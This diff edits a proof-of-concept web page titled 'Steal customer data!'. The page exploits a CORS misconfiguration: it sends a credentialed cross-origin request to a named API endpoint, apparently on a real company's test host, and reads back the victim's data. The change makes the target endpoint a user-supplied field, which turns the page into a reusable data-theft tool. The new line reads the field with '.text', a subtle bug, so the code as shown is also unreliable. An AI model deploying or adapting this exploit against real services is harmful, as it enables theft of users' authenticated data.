--- a/cors.html
+++ b/cors.html
@@ -5,10 +5,11 @@
 <h3>Steal customer data!</h3>
 <html>
 <body>
-<button type='button' onclick='cors()'>Exploit</button>
+<input placeholder="https://api-uat.netinsights.veritas.com/appdetailinfolist" type="text" id="endpoint" />&nbsp;<button type='button' onclick='cors()'>Exploit</button>
 <p id='demo'></p>
 <script>
 function cors() {
+var endpoint = document.getElementById('endpoint').text;	
 var xhttp = new XMLHttpRequest();
 xhttp.onreadystatechange = function() {
 if (this.readyState == 4 && this.status == 200) {
@@ -17,7 +18,7 @@ if (this.readyState == 4 && this.status == 200) {
 	console.log(a);
 }
 };
-xhttp.open("GET", "https://api-uat.netinsights.veritas.com/appdetailinfolist", true);
+xhttp.open("GET", endpoint, true);
 xhttp.withCredentials = true;
 xhttp.send();
 }
